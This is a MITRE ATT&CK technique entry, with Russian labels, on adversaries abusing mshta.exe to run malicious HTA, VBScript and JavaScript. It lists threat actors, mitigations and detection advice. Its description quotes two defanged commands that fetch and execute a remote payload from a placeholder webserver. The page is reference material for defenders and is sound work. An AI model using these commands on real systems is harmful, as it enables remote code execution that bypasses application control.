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System Binary Proxy Execution:  Утилита mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

ID: T1218.005
Относится к технике:  T1218
Тактика(-и): Defense Evasion
Платформы: Windows
Требуемые разрешения: User
Источники данных: Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation
Версия: 2.0
Дата создания: 23 Jan 2020
Последнее изменение: 11 Mar 2022

Примеры процедур

Название Описание

Sidewinder has used mshta.exe to execute malicious payloads.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)

Lazarus Group

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)


Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)


MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)


Xbash can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)

Mustang Panda

Mustang Panda has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT December 2019)


BabyShark has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)


LazyScripter has used `mshta.exe` to execute Koadic stagers.(Citation: MalwareBytes LazyScripter Feb 2021)


POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)

Lazarus Group

Lazarus Group has used mshta.exe to run malicious scripts and download programs.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)


TA2541 has used `mshta` to execute scripts including VBS.(Citation: Cisco Operation Layover September 2021)


Metamorfo has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018)


Inception has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)


Kimsuky has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: KISA Operation Muzabi)


FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FIN7 April 2017)

Revenge RAT

Revenge RAT uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)

Earth Lusca

Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)


APT32 has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)


NanHaiShu uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)


Sibot has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)

During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`.(Citation: Cylance Dust Storm)


APT29 has use `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 2021)


Confucius has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018)


Covenant can create HTA files to install Grunt listeners.(Citation: Github Covenant)


Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm January 2022)


TA551 has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021)


SideCopy has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021)

Gamaredon Group

Gamaredon Group has used `mshta.exe` to execute malicious files.(Citation: Symantec Shuckworm January 2022)(Citation: unit42_gamaredon_dec2022)

During C0015, the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)


Контрмера Описание
Execution Prevention

Block execution of code on a system through application control, and/or script blocking.

Disable or Remove Feature or Program

Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.


Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed. Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious


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